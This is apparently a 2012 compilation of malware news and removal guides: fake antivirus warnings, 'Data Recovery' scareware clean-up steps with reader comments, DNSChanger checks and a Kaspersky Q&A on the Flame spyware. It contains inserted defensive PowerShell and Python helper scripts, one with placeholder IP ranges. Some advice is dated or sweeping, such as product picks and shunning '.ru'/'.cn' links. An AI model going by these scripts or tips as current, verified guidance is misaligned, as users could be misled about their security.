Fortunately, other anti-malware software did detect it. Figure 20 shows the warning from AVG Free when you attempt to open the Control Panel applet. AVG Free also threw a similar warning when I downloaded the installer.

AVG also detects the other vectors installed by the malware and very efficiently removes them for you, as shown in Figure 21. I did not test with any other anti-malware software. As the test results on Virus Total showed, the malware would probably be missed by at least some legitimate anti-malware software.

Figure 20: AVG Free detects the malware on open

Figure 21: AVG Free removes the malware


This type of malware is very, very disturbing. One can only wonder how many users have been duped into installing ineffective security software, and what happened to their private information and credit card data when they paid for it. The presence of such software, and the overall very high quality of the ruse it presents, is frightening. More than likely, thousands of people have been fooled. In fact, this type of deception has been around for several years now, and it would not still be here if it did not work well.

This should serve as a dire warning to all: be extremely careful what you trust, and question everything that looks even remotely suspicious. For example, no website can run an anti-malware scan on your computer simply by your visiting the site. Any site that purports to do so is almost certainly run by criminal gangs.

No website should ever offer you to download an anti-malware package as soon as you visit the site. Any site that purports to do so is either run by criminal gangs or by an organization whose business practices are so deceptive that you should never consider doing business with it. A reputable site will present you with product information and then leave the downloading decision up to you, not force it upon you. No software that pushes the purchase decision so heavily in your face is likely to be legitimate.

Finally, learn just a little about how your computer looks normally so you can detect changes. The fake Windows Security Center is a very nice touch that could fool almost anyone who doesn't pay attention to what the real one looks like and is called.

As for your anti-malware software, yes you need it. We all really do, at least on some computers. Advocating that you should stop using anti-malware software is irresponsible. If people were to actually take that advice, we would be overrun with malware in short order. You should definitely have anti-malware software on any computer that may come into contact with untrusted data and software.

However, do not just pick software because it tells you to pick it. Stick to the trusted brand names when it comes to anti-malware. And, if you get a download shoved onto your computer when you visit a website, head over to Virus Total and submit it for a scan. If it proves malicious, they will submit it to the anti-malware vendors for you.

Jesper M. Johansson is a Software Architect working on security software and is a contributing editor to TechNet Magazine. He holds a Ph.D. in Management Information Systems, has more than 20 years experience in security, and is a Microsoft Most Valuable Professional (MVP) in Enterprise Security. His latest book is the Windows Server 2008 Security Resource Kit.

[Sep 10, 2012] Search results may deliver tainted links by Byron Acohido

According to Blue Coat Security Lab users are four times as likely to be infected by compromised search results when compared to spam emails.
6/17/2012 | USA TODAY

Internet search results have surpassed e-mail as the main way cybercriminals attempt to victimize Internet users.

That's the upshot of an analysis of Web traffic from more than 75 million users on home and corporate networks conducted by Blue Coat Security Lab.

Researchers found criminals are poisoning the search results consumers receive when searching on Google, Bing, Yahoo and other search services - and at a rate four times more frequently than they are sending tainted links through e-mail.

The end game in each case is to get you to fall for scams or to infect and take control of your PC. "Searching is at least as dangerous as going into your e-mail in-box and clicking on things," says Chris Larsen, Blue Coat's chief malware expert.

Crooks know that every minute of every day hundreds of millions of people worldwide use search engines "mentally predisposed to click on things because we're exploring," says Larsen. The bad guys may be turning to tainted search results because e-mail defenses have gotten tighter, and most people are on the lookout for suspicious messages, says Peter Cassidy, secretary general of the Anti-Phishing Working Group.

Sometimes the tainted Web links show up when users search for information about major news events or celebrities. But increasingly, they are also surfacing in search results for hundreds of mundane topics, such as recipes and sample letters, Larsen says.

Google and Microsoft, which supplies the search engine for Bing and Yahoo search services, are pouring resources into eradicating poisoned search results. "A combination of automated and manual processes helps us respond quickly to evolving threats and stay a step ahead," says Matt Cutts, who heads up Google's "Webspam" team.

Even so, attacks continue to get through. In 2011, 26 million new samples of malicious software were detected on the Internet. And an estimated 39% of the world's PCs are currently infected, according to the Anti-Phishing Working Group.

Poisoned search results add to the mix of bad things lurking on the Internet. Consumers can protect themselves by being wary of certain Web address endings. As a rule, it is wise to avoid clicking on links that include ".ru" (Russia) or ".cn" (China) in the address line, since attacks often originate from those nations.

Google: 12 To 14 Million Searches Per Day Returned Hacked Sites by Barry Schwartz

Jun 19, 2012

Google's security blog announced today several updates on how they have been addressing malware and hacked sites on the internet.

Google said that between 12 and 14 million search queries per day return warnings that at least one of the listed results was compromised. Google has two types of labels for hacked sites: compromised and harmful. Compromised sites have been hacked and their content and links may have changed, but clicking on them is probably not harmful to the searcher. The harmful warning is an extended warning that says that if you go to the web site, your computer may be infected with malware.

Google finds about 9,500 new malicious websites every day and sends "thousands of notifications daily to webmasters."

[Aug 21, 2012] Battling Zombies and Botnets

The Obama administration and major industry groups unveiled a new initiative Wednesday to battle the increasing number of networked computers that are being transformed into botnets.

A botnet is a collection of computers that have been made into the tech equivalent of zombies -- computers that have been taken over remotely by a third party, generally to conduct malicious online activities such as spreading viruses, overloading servers, and sending spam, among other things. It is estimated that 1 in 10 computers in the U.S. could be a zombie member of a botnet.

The initiative this week had three significant parts:

Botnets are not new but as more and more individuals go online, the potential damage from them increases significantly. In addition, the culling of data from botnets affects efforts to protect consumers from data theft and identity fraud.

While there have been numerous initiatives and campaigns around cybersecurity -- many of which have begun only to fizzle out -- the creation of the botnet initiative has merit. Botnets are very much the enemy within us (in cyberspace) that are harmful not only to the infected computers but to the larger networked community. The more information the government and companies can share about botnets, the more likely we can start de-zombifying infected computers.

[Jul 30, 2012] Data Recovery Trojan

You need to understand that you are dealing with professionals. Criminal professionals, and as such you are outgunned. Traditional methods of malware disinfection will eventually work, but do you have time to wait until they debug their stuff?

So recovery based on a drive image is the only reasonable strategy that works. There are two options here:

  1. Use Windows System Restore. Restart your computer, press the F8 key and select Safe Mode. Then run 'restore'; restore points will be listed by date. Select the restore point you want and wait until the process finishes. Learn as much as you can about this Windows mechanism and try it first. For more about restore points see System Restore - Windows 7 features.
  2. Use the Softpanorama Malware Defense Strategy. This is probably the best option for a complex infection with rootkit elements present, like this one, and it does not rely on some super-duper AV program that happens to know the strain of malware you got. It just presumes that you regularly back up your C partition to a USB or network drive with Acronis True Image, Ghost or another "ghoster" that creates an image of your C partition, so that when disaster strikes you have a not-too-old image available for recovery.

Preliminary steps to help to recover your data hijacked by the Trojan:

There are two traditional approaches which might help at least to alleviate some of the pain. I would like to stress that the main problem here is the infection with Win32:Sirefef, not so much the Data Recovery scareware. You need to know quite a lot about Windows to disinfect it correctly and prevent reinfection. Just running a "super-duper" antivirus program is usually not enough; a combination of such programs might help. I would recommend two options:

[Jul 29, 2012] How to Remove Data Recovery Malware

This scareware program is bundled with the rootkit Win32:Sirefef, a family of malware that controls the infected computer's Internet activities by redirecting requested URLs to different ones. I recommend using the Softpanorama Malware Defense Strategy, booting from the recovery CD. You can also use System Restore: restart your computer, press the F8 key and select Safe Mode. Then run 'restore'; restore points will be listed by date. Select the one you want and wait until the process finishes.
April 28, 2012

Data Recovery is scareware masquerading as a computer repair and optimization program. It pretends to scan your computer for hard drive, RAM and Windows registry errors and displays fake warnings. None of this is really surprising, or at least it shouldn't be, because it is typical scareware. The cyber crooks behind Data Recovery just want to trick as many Internet users as possible into paying for a bogus computer repair program. This scareware is usually installed by the user when visiting infected/malicious websites or opening infected attachments. Malware authors also use social engineering and drive-by downloads to distribute it. Once installed, you may be asked to pay to fix supposedly detected critical hard drive errors and RAM failures. Just ignore those fake warnings and notifications about non-existent problems and uninstall Data Recovery from your computer. Of course, that is easier said than done, so to remove this malware from your computer, please follow the removal instructions below.

When running, Data Recovery will report the following problems on your computer:

It detects 14 errors on each infected computer. It doesn't matter whether it is a brand new PC or an old laptop. All the errors and warnings are predetermined, so don't get spooked. Data Recovery is more annoying than dangerous; however, there is one thing that shouldn't be overlooked. The rogue program hides certain files, usually shortcuts and Desktop icons, and moves other files to the Windows %Temp%\smtmp folder.

Do not delete any files from your Temp folder; otherwise you'll have to use Windows CD/DVD to restore your system. Thankfully, you can unhide your files rather easily. Just follow the removal instructions below.

It is also worth mentioning that Data Recovery executable drops a rootkit from the TDSS family. If you don't remove the rootkit the rogue application will be re-installed.

Fake Data Recovery warnings:

Additionally, you can activate the rogue program by entering this registration code 15801587234612645205224631045976 08869246386344953972969146034087 and any email as shown in the image below. Once this is done, you are free to install anti-malware software and remove the rogue anti-virus program from your computer properly.

That's probably the easiest way to remove the Data Recovery malware: enter the code and then run a full system scan with recommended anti-malware software (Spyware Doctor). You can also remove malicious files manually. One way or another, please follow the steps in the removal guide below. And if you have already purchased this bogus computer repair program, please contact your credit card company immediately and dispute the charges. Next time purchase software from reputable vendors only and keep it up to date. If you need help removing Data Recovery, please leave a comment below or email us. Good luck and be safe online!

Quick removal:

1. Use debugged registration key and fake email to register Data Recovery malware. This will allow you to download and run any malware removal tool you like and restore hidden files and shortcuts. Choose to activate "Data Recovery" manually and enter the following email and activation code: 08869246386344953972969146034087 (new code!) 1203978628012489708290478989147 (old code, may not work anymore)

2. Download TDSSKiller and run a system scan. Remove found rootkits as shown in the image below. Reboot your computer if required.

3. Download recommended anti-malware software (Spyware Doctor) and run a full system scan to remove this virus from your computer.

Alternative Data Recovery removal instructions:

1. First of all, you need to unhide the files and folders. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter cmd and hit Enter or click OK.

At the command prompt, enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders. NOTE: you may have to repeat this step because the malware may hide your files again.

If you still can't see any of your files, Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter explorer and hit Enter or click OK.

2. Open Internet Explorer. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter iexplore.exe and hit Enter or click OK.

Open Internet Explorer and download TDSSKiller or Backdoor.Tidserv Removal Tool. This malware usually (but not always) comes bundled with the TDSS rootkit. Removing this rootkit from your computer (if it exists) is very important. Run TDSSKiller or Backdoor.Tidserv Removal Tool to remove the rootkit.

3. Finally, download recommended anti-malware software (Spyware Doctor) to remove this virus from your computer.

NOTE: in some cases the rogue program may block anti-malware software. Before saving the selected program onto your computer, you may have to rename the installer to iexplore.exe or winlogon.exe. With all of these tools, if running Windows 7 or Vista, they MUST be run as administrator. Launch the program and follow the prompts. Don't forget to update the installed program before scanning.

Alternate Data Recovery removal instructions:

1. First of all, you need to unhide the files and folders. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter cmd and hit Enter or click OK.

At the command prompt, enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders. NOTE: you may have to repeat this step because the malware may hide your files again.

2. The rogue application places an icon on your desktop. Right click on the icon, click Properties in the drop-down menu, then click the Shortcut tab.

The location of the malware is in the Target box.

On computers running Windows XP, malware hides in: C:\Documents and Settings\All Users\Application Data\

NOTE: by default, Application Data folder is hidden. Malware files are hidden as well. To see hidden files and folders, please read Show Hidden Files and Folders in Windows.

Under the Hidden files and folders section, click Show hidden files and folders, and remove the checkmark from the checkbox labeled:

- Hide extensions for known file types
- Hide protected operating system files

Click OK to save the changes. Now you will be able to see all files and folders in the Application Data directory.

On computers running Windows Vista/7, malware hides in: C:\ProgramData\

3. Look for suspect ".exe" files in the given directories depending on the Windows version you have.

Example Windows XP:
C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe
C:\Documents and Settings\All Users\Application Data\ixgPHgbBMPf.exe

Example Windows Vista/7:
C:\ProgramData\6DSS92c31Apgjk.exe
C:\ProgramData\ixgPHgbBMPf.exe

Basically, there will be a couple of ".exe" files named with a series of random numbers or letters.

Rename those files to 6DSS92c31Apgjk.vir, ixgPHgbBMPf.vir etc. For example:

It should be: C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.vir

Instead of: C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe

4. Restart your computer. The malware should be inactive after the restart.

5. Open Internet Explorer and download TDSSKiller or Backdoor.Tidserv Removal Tool. This malware usually (but not always) comes bundled with the TDSS rootkit. Removing this rootkit from your computer (if it exists) is very important. Run TDSSKiller and remove the rootkit.

6. Download recommended anti-malware software (Spyware Doctor) to remove this virus from your computer

NOTE: in some cases the rogue program may block anti-malware software. Before saving the selected program onto your computer, you may have to rename the installer to iexplore.exe or winlogon.exe. With all of these tools, if running Windows 7 or Vista, they MUST be run as administrator. Launch the program and follow the prompts. Don't forget to update the installed program before scanning.
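The manual steps above (unhide the shortcuts, find the randomly named .exe sitting directly in the all-users profile data folder, rename it to .vir) as a report-first PowerShell helper. This is an added example, not code from the original post; it assumes only the layout the page describes and knows none of the rogue's file names, so it lists candidates for you to judge and renames nothing unless asked.

```powershell
# Added example: scoped PowerShell version of the manual "Data Recovery" clean-up.
# Assumption (from the page): the rogue drops a randomly named .exe directly in
# C:\ProgramData (Vista/7) or All Users\Application Data (XP), hides shortcuts
# and Desktop icons, and parks moved files in %Temp%\smtmp. File names are unknown.

# Candidate drop folders, whichever exist on this Windows version.
$script:DropDirs = @(
    $env:ProgramData,                                    # Vista/7
    (Join-Path $env:ALLUSERSPROFILE 'Application Data')  # XP
) | Where-Object { $_ -and (Test-Path $_) } | Select-Object -Unique

function Get-SuspectDropper {
    # Top-level .exe files only: legitimate products keep their binaries in
    # subfolders, the rogue sits directly in the folder (see the page's examples).
    foreach ($dir in $script:DropDirs) {
        Get-ChildItem -Path $dir -Filter '*.exe' -Force -ErrorAction SilentlyContinue |
            Where-Object { -not $_.PSIsContainer } |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                New-Object PSObject -Property @{
                    Path    = $_.FullName
                    Hidden  = ([int]($_.Attributes -band [IO.FileAttributes]::Hidden) -ne 0)
                    Created = $_.CreationTime
                    Signed  = ($sig.Status -eq 'Valid')
                }
            }
    }
}

function Disable-SuspectDropper {
    # Rename to .vir as the page does: the file can no longer start with Windows
    # but is kept for analysis. Honors -WhatIf / -Confirm; nothing is deleted.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(ValueFromPipeline = $true)] $Candidate)
    process {
        $newName = [IO.Path]::GetFileNameWithoutExtension($Candidate.Path) + '.vir'
        if ($PSCmdlet.ShouldProcess($Candidate.Path, "Rename to $newName")) {
            Rename-Item -Path $Candidate.Path -NewName $newName -Force
        }
    }
}

function Restore-HiddenShortcut {
    # Scoped equivalent of the page's "attrib -h /s /d": clear the Hidden attribute
    # under the Desktop and Start Menu folders only, not the whole drive.
    # desktop.ini is legitimately hidden and is left alone.
    $roots = @(
        [Environment]::GetFolderPath('Desktop'),
        [Environment]::GetFolderPath('StartMenu'),
        (Join-Path $env:ALLUSERSPROFILE 'Start Menu'),                   # XP
        (Join-Path $env:ALLUSERSPROFILE 'Microsoft\Windows\Start Menu')  # Vista/7
    ) | Where-Object { $_ -and (Test-Path $_) } | Select-Object -Unique
    foreach ($root in $roots) {
        Get-ChildItem -Path $root -Recurse -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -ne 'desktop.ini' -and
                           ([int]($_.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) } |
            ForEach-Object {
                $_.Attributes = $_.Attributes -bxor [IO.FileAttributes]::Hidden
                $_.FullName   # report what was unhidden
            }
    }
}

# Report-only run. Review the list before renaming anything, e.g.:
#   Get-SuspectDropper | Disable-SuspectDropper -WhatIf                        (dry run)
#   Get-SuspectDropper | Where-Object { -not $_.Signed } | Disable-SuspectDropper
Get-SuspectDropper | Format-Table Path, Hidden, Signed, Created -AutoSize
Restore-HiddenShortcut

# The page warns not to delete %Temp%\smtmp: the moved Start Menu entries live there.
$smtmp = Join-Path $env:TEMP 'smtmp'
if (Test-Path $smtmp) {
    "Moved items parked in $smtmp :"
    Get-ChildItem -Path $smtmp -Recurse -Force | Select-Object -ExpandProperty FullName
}
```

Run it from an elevated PowerShell prompt (the page's own note about running as administrator applies); a rogue that blocks tools may also block this script until the registration-code trick above has been used.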

Associated Data Recovery files and registry values:


Windows XP:

  • %AllUsersProfile%\Application Data\[SET OF RANDOM CHARACTERS]
  • %AllUsersProfile%\Application Data\[SET OF RANDOM CHARACTERS].exe
  • %UsersProfile%\Desktop\Data Recovery.lnk
  • %UsersProfile%\Start Menu\Programs\Data Recovery\
  • %UsersProfile%\Start Menu\Programs\Data Recovery\Data Recovery.lnk
  • %UsersProfile%\Start Menu\Programs\Data Recovery\Uninstall Data Recovery.lnk

%AllUsersProfile% refers to: C:\Documents and Settings\All Users
%UserProfile% refers to: C:\Documents and Settings\[User Name]

    Windows Vista/7:

    Registry values:


    My thanks as well. I was able to get rid of the malware too. An additional comment to others is that in my case the files in my Temp folder (as described above) were taken from the Start Menu Programs folder from both my personal profile and the All users profile. Hope this helps.


    Thanks very much for this post. I couldn't find anything on this -ware because it was so new. I searched for the 6DSS92c31Apgjk.exe on Google and found this. I'll check this blog out more often. Cheers!

    Also, for those that cannot connect to the internet on wi-fi, try plugging into the wireless router, make sure you are connected locally (On the status bar, bottom-right, near the clock, right-click the symbol for the internet connection and click on "Open Network Connections [This is for XP users...sorry Vista, etc. users]) and make sure that your local connection is good).

    If you cannot connect, you might want to connect to the internet using another computer. (And if you're trying to use the activation code, I hope someone else can help).

    Good luck, all!

    Hi again, I used TDSSKiller as you said to. It found a rootkit and removed it immediately. Thanks so much!

    This blog has saved my computer!

    Thanks. You and your blog helped me! I had a new exe file (bPxedpkqwSG.exe), but I renamed files, ran TDSSKiller, MalwareBytes, and my system is back! THANK YOU!

    I have to change the screen-resolution, and un-hide the files.

    I have a daily updated NOD Internet Security, so I'm very upset! :S

    "1 thread found: Locked file, Service: sptd." As for this problem, I had the same and I tried to remove it manually (in the section "alternate data recovery removal instruction") and it worked. And then I downloaded one of the anti-malware programs mentioned above and let it scan my computer; it removed all of the malware.
    Hi, I think the rogue program came bundled with a rootkit. Please run TDSSKiller by Kaspersky first. If you can't run it in Normal Mode, please reboot your computer in Safe Mode.


    Well, I guess it was the Canadian Pharmacy e-mail I received and opened, too ignorant to know what I had done to myself.

    I lost all icons on my Desktop, I don't have access to the command prompt, not even with Control +R, nothing is appearing on my Drive C, and there is no Windows key on my laptop. Thus, I can't perform any of the suggestion and solutions being so generously shared here. I did get IE back on my Start Menu, but not Firefox, which I prefer. When I reboot, Yahoo Messenger does open.

    Being on a fixed income, I just can't afford to buy any additional software. What can I do? Your help is appreciated. Thank you.


    May I suggest before doing any of the above try to do SYSTEM RESTORE if possible. I tried to remove it manually but yet couldn't get start menu to show up despite trying unhide.exe. The system restore helped me. Thankfully my system was restored to just a day before so didn't lose much of work. Hope it helps!
    I didn't think I was able to resolve this one, but, I followed directions! Installed TDSSKiller & MalwareBytes in Safe Mode, clicked Scan and deleted the files it recommended. Then, started in Normal Mode, noticed all shortcuts and desktop icons were gone. Downloaded Unhide.exe, ran the program and BooM! all icons/shortcuts were back! Fully Restored! Easy!
    I downloaded all the files that were on this blog and installed them on my computer. They all worked and my computer is fixed, but the overall style of my computer is different. Not only that, but I can't use the internet, I can't play audio files on my computer, I can only open certain files. What do I do? Don't want to take it to the geek squad because I don't feel like spending $80 to get this fixed. Can you help me?
    This is what I did to avoid the virus regeneration ( for Windows XP):

    1) ...enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders.

    2) Then you will find the rogue application places an " system check" icon on your desktop.

    3) Right click on that icon, click "Properties" in the drop-down menu, then click the "Shortcut" tab.

    4) In that same window, click the bottom left tab "Find Folders" (sorry I forgot the exact name). You will get a new window "Application Data".

    5) Check carefully under this "Application Data" window, you'll find some suspicious .exe files.

    6) Rename those files by changing the .exe to .vir

    Now, you can restart your computer. The malware should be inactive after the restart.

    Hope this helps, Good Luck!

    ok I already got it, after removing the virus use the unhide program. It might take a few attempts. As soon as you recover your desktop icons then go on the start button, maybe options might be missing, just press right click, go to properties, then go to reestablished settings and there ya go xD sorry for my bad punctuation
    just a quick one for anyone want to try an alternative resolution.

    Restart your computer then Press F8 key and then select Safe Mode... let it run

    Then, run 'restore' restore options will be listed based on dates - then select your desired restore option - then wait till the process finish.

    please note: I am running Windows 7; after I restored my system it came back to normal except that some files (not really important) have been deleted.

    before opening any browsers in my computer I have to do Windows update specially the Security Essentials.

    Good luck!

    I just got hit by this thing hours before an exam was due. Broke into a sweat before I found this page. You saved my life. Thank you.
    I would honestly kill one of these SOB's for all the time I've lost to crapware like this over the years. I do desktop IT support for my company and regardless of the AV product we use inevitably these things get in anyways.
    I discovered after quite a bit of frustration that if you can download the Unhide.exe program onto a flash drive in a folder and then insert it into one of your USB ports, you will get the OPEN WITH "box" to come up. You can then go to open the folder at the bottom of the list, click on it and when it opens, click on the unhide.exe program. It takes a bit, but be patient. It will unhide all of your desktop icons so you can go do a system restore. Just make sure you don't restore it to the day you had the malware show up or you will be back to square one. I know..I got a bit hasty and did just that accidentally.
[Jul 29, 2012] Security Shield

    I recommend using the Softpanorama Malware Defense Strategy

    One of the rogue anti-spyware programs from the FakeVimes malware family, Windows Safety Wizard, is a fake security application that takes on the form and supposed capabilities of genuine anti-malware software. While Windows Safety Wizard is promoted as a quick fix-all solution to virus, Trojan, spyware and rootkit infestations and threats, Windows Safety Wizard is nothing more than scamware designed to mislead PC users and web surfers. Functioning in the same way as its clones Windows Ultimate Security Patch, Windows Activity Debugger, Windows Premium Guard and Windows Pro Rescuer, Windows Safety Wizard is created by cybercriminals who are motivated by easy profit, without offering anything valuable in exchange for it.

    Remove Security Shield manually

    Another method to remove Security Shield is to manually delete Security Shield files in your system. Detect and remove the following Security Shield files:


    Other Files

    Registry Keys


    [Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder

    Compare with Assange: Facebook, Google, Yahoo spying tools for US intelligence

    As the "single most powerful tool for population control," the CIA's "Facebook program" has dramatically reduced the agency's costs - at least according to the latest "report" from the satirical mag The Onion.

    Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook "the most appalling spy machine that has ever been invented," The Onion's video fires a number of arrows in Facebook's direction - with hilarious results.

    In the video, Facebook founder Mark Zuckerberg is dubbed "The Overlord" and is shown receiving a "medal of intelligence commendation" for his work with the CIA's Facebook program.

    The Onion also takes a jab at FarmVille (which is responsible for "pacifying" as much as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).


    CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network

    [Jul 08, 2012] DNS-changer-malware

    DNSChanger malware causes a computer to use rogue DNS servers in one of two ways. First, it changes the computer's DNS server settings to replace the ISP's good DNS servers with rogue DNS servers operated by the criminals. Second, it changes the DNS servers that devices on the victim's small office/home office (SOHO) network use, again from the ISP's good DNS servers to rogue DNS servers operated by the criminals. This second change may impact all computers on the SOHO network, even if those computers are not infected with the malware.

    ... ... ...

    To determine if a computer is using rogue DNS servers, it is necessary to check the DNS server settings on the computer. If the computer is connected to a wireless access point or router, the settings on those devices should be checked as well.

    ... ... ...

    To make the comparison between the computer's DNS servers and this table easier, start by comparing the first number before the first dot. For example, if your DNS servers do not start with 85, 67, 93, 77, 213, or 64, you can move on to the next step. If your servers start with any of those numbers, continue the comparison.

    Rogue DNS Servers

    If your computer is configured to use one or more of the rogue DNS servers, it may be infected with DNSChanger malware. Home computers with high-speed Internet connections and office computers typically obtain their IP settings via DHCP from a device on the network. In these cases, the computers are provided with an IP address, default gateway, and DNS server settings. The IP addresses usually fall into one of three ranges of private addresses: 10.0.0.0 to 10.255.255.255; 172.16.0.0 to 172.31.255.255; and 192.168.0.0 to 192.168.255.255. In most homes, computers are assigned an address from a small block within the last of those ranges, and the default gateway and DNS servers are set to the home router's own address. In that case the computer defers to the router, so the router's DNS settings decide which servers are really used. To determine if your computer is utilizing the rogue DNS servers, read the next section, Checking the Router.
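    The two-stage comparison described above (first-octet pre-screen, then full range match), applied to DNS settings pulled from resolv.conf or `ipconfig /all` output, as an added example that is not part of the FBI document quoted here. The first octets are the ones named in the text; the full rogue-range table is not reproduced on this page, so the ranges below are constructed placeholders, and a private DNS address is reported as "router" because the router's own settings must then be checked.

```python
import ipaddress
import re

# First octets the text names for the quick pre-screen of configured DNS servers.
ROGUE_FIRST_OCTETS = {85, 67, 93, 77, 213, 64}

# CONSTRUCTED PLACEHOLDER: the full rogue-range table from the FBI document is
# not reproduced on this page. Replace these entries with the ranges from that
# table before relying on the "rogue" verdict; the real entries are narrower.
ROGUE_RANGES_PLACEHOLDER = [
    ipaddress.ip_network("85.255.0.0/16"),
    ipaddress.ip_network("213.109.0.0/16"),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_dns_servers(config_text):
    """Collect DNS server addresses from resolv.conf-style 'nameserver' lines
    or from the 'DNS Servers' entry of `ipconfig /all` output, where Windows
    lists additional servers on bare indented continuation lines."""
    servers = []
    in_dns_block = False
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("nameserver"):
            servers.extend(IPV4.findall(stripped))
            in_dns_block = False
        elif "DNS Servers" in stripped:
            servers.extend(IPV4.findall(stripped.split(":", 1)[-1]))
            in_dns_block = True
        elif in_dns_block and IPV4.fullmatch(stripped):
            servers.append(stripped)          # continuation line
        else:
            in_dns_block = False              # any other key ends the block
    return servers


def classify_dns_server(addr):
    """Apply the two-stage comparison from the text to one address.

    'router' - a private address: the computer defers to the home router, so
               the router's own DNS settings must be checked next.
    'clear'  - first octet is not in the rogue list (no further comparison
               needed), or the full comparison matched no listed range.
    'rogue'  - address falls inside a listed rogue range.
    """
    ip = ipaddress.ip_address(addr)
    if ip.is_private:
        return "router"
    first_octet = int(addr.split(".")[0])
    if first_octet not in ROGUE_FIRST_OCTETS:
        return "clear"
    if any(ip in net for net in ROGUE_RANGES_PLACEHOLDER):
        return "rogue"
    return "clear"


def audit_dns_settings(config_text):
    """Return {address: verdict} for every distinct DNS server in config_text."""
    return {addr: classify_dns_server(addr)
            for addr in dict.fromkeys(extract_dns_servers(config_text))}


# Constructed sample inputs (not real captures).
SAMPLE_RESOLV_CONF = """\
# resolv.conf generated by DHCP
nameserver 192.168.1.1
nameserver 8.8.8.8
"""

SAMPLE_IPCONFIG = """\
Ethernet adapter Local Area Connection:
   IPv4 Address. . . . . . . . . . . : 192.168.1.23
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.10.20
                                       213.109.5.6
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    for name, text in (("resolv.conf", SAMPLE_RESOLV_CONF), ("ipconfig", SAMPLE_IPCONFIG)):
        print(name, audit_dns_settings(text))
```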

    ... ... ...

    In addition to directing your computer to utilize rogue DNS servers, the DNSChanger malware may have prevented your computer from obtaining operating system and anti-malware updates, both critical to protecting your computer from online threats. This behavior increases the likelihood of your computer being infected by additional malware. The criminals who conspired to infect computers with this malware utilized various methods to spread the infections. At this time, there is no single patch or fix that can be downloaded and installed to remove this malware. Individuals who believe their computer may be infected should consult a computer professional. Individuals who do not have a recent backup of their important documents, photos, music, and other files should complete a backup before attempting to clean the malware or utilize the restore procedures that may have been packaged with their computer. Information regarding malicious software removal can be found at the website of the United States Computer Emergency Readiness Team.

    [May 31, 2012] The Flame Questions and Answers by Aleks, Kaspersky Lab Expert

    May 28 | Securelist

    Duqu and Stuxnet raised the stakes in the cyber battles being fought in the Middle East – but now we've found what might be the most sophisticated cyber weapon yet unleashed. The 'Flame' cyber espionage worm came to the attention of our experts at Kaspersky Lab after the UN's International Telecommunication Union came to us for help in finding an unknown piece of malware which was deleting sensitive information across the Middle East.

    While searching for that code – nicknamed Wiper – we discovered a new malware codenamed Worm.Win32.Flame.

    Flame shares many characteristics with notorious cyber weapons Duqu and Stuxnet: while its features are different, the geography and careful targeting of attacks coupled with the usage of specific software vulnerabilities seems to put it alongside those familiar 'super-weapons' currently deployed in the Middle East by unknown perpetrators. Flame can easily be described as one of the most complex threats ever discovered. It's big and incredibly sophisticated. It pretty much redefines the notion of cyberwar and cyberespionage.

    For the full low-down on this advanced threat, read on…

    General Questions

    What exactly is Flame? A worm? A backdoor? What does it do?

    Flame is a sophisticated attack toolkit, which is a lot more complex than Duqu. It is a backdoor, a Trojan, and it has worm-like features, allowing it to replicate in a local network and on removable media if it is commanded so by its master.

    The initial point of entry of Flame is unknown - we suspect it is deployed through targeted attacks; however, we haven't seen the original vector of how it spreads. We have some suspicions about possible use of the MS10-033 vulnerability, but we cannot confirm this now.

    Once a system is infected, Flame begins a complex set of operations, including sniffing the network traffic, taking screenshots, recording audio conversations, intercepting the keyboard, and so on. All this data is available to the operators through the link to Flame's command-and-control servers.

    Later, the operators can choose to upload further modules, which expand Flame's functionality. There are about 20 modules in total and the purpose of most of them is still being investigated.

    How sophisticated is Flame?

    First of all, Flame is a huge package of modules comprising almost 20 MB in size when fully deployed. Because of this, it is an extremely difficult piece of malware to analyze. The reason why Flame is so big is because it includes many different libraries, such as for compression (zlib, libbz2, ppmd) and database manipulation (sqlite3), together with a Lua virtual machine.

    Lua is a scripting (programming) language, which can very easily be extended and interfaced with C code. Many parts of Flame have high order logic written in Lua -- with effective attack subroutines and libraries compiled from C++.

    The effective Lua code part is rather small compared to the overall code. Our estimation of development 'cost' in Lua is over 3000 lines of code, which for an average developer should take about a month to create and debug.

    Also, there are internally used local databases with nested SQL queries, multiple methods of encryption, various compression algorithms, usage of Windows Management Instrumentation scripting, batch scripting and more.

    Running and debugging the malware is also not trivial as it's not a conventional executable application, but several DLL files that are loaded on system boot.

    Overall, we can say Flame is one of the most complex threats ever discovered.

    How is this different to or more sophisticated than any other backdoor Trojan? Does it do specific things that are new?

    First of all, usage of Lua in malware is uncommon. The same goes for the rather large size of this attack toolkit. Generally, modern malware is small and written in really compact programming languages, which make it easy to hide. The practice of concealment through large amounts of code is one of the specific new features in Flame.

    The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame's completeness - the ability to steal data in so many different ways.

    Another curious feature of Flame is its use of Bluetooth devices. When Bluetooth is available and the corresponding option is turned on in the configuration block, it collects information about discoverable devices near the infected machine. Depending on the configuration, it can also turn the infected machine into a beacon, and make it discoverable via Bluetooth and provide general information about the malware status encoded in the device information.

    What are the notable info-stealing features of Flame?

